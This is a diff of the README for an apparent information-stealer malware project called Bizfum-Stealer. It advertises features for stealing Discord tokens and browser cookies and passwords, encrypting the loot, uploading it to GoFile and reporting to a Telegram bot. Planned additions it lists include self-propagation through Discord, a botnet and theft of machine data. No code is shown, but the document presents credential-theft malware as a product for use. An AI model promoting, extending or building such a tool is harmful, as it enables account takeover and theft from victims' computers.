UnknownWebPT/Bizfum-Stealer/README.md

 - Captures Discord tokens.
 - Stealing of Chrome and Firefox cookies + passwords.
 - Zipping of stolen data -> AES Encryption of ZIP file -> RSA Encryption of AES Encryption Key.
+- Uploading of encrypted data to GoFile
+- Send a download link to a Telegram channel through an bot.
+- Possibility of generating a new fresh RSA (CNG) key, choose own XOR key, and unique encoding of Telegram token.
+This is all automated by `config.py`.

 ## 🛠️ Coming Features
 - Other browser theft.
 - Self-propagation through applications such as Discord.
-- Uses `winhttp.dll` to upload stolen data to gofile.io via their API.
 - Extraction of game tokens or credentials.
-- Potential development of a Telegram-based botnet without requiring constant connectivity or request spamming.
+- Potential development of a botnet.
+- Better "infected" message to Telegram.
+- Machine information theft (IP, Computer Name, AD info, etc).
+- More customization features to `config.py`.

 ## 🧬 DLLs the Stealer Takes Advantage of
 - C:\Program Files\Mozilla Firefox\nss3.dll ( If Firefox is installed )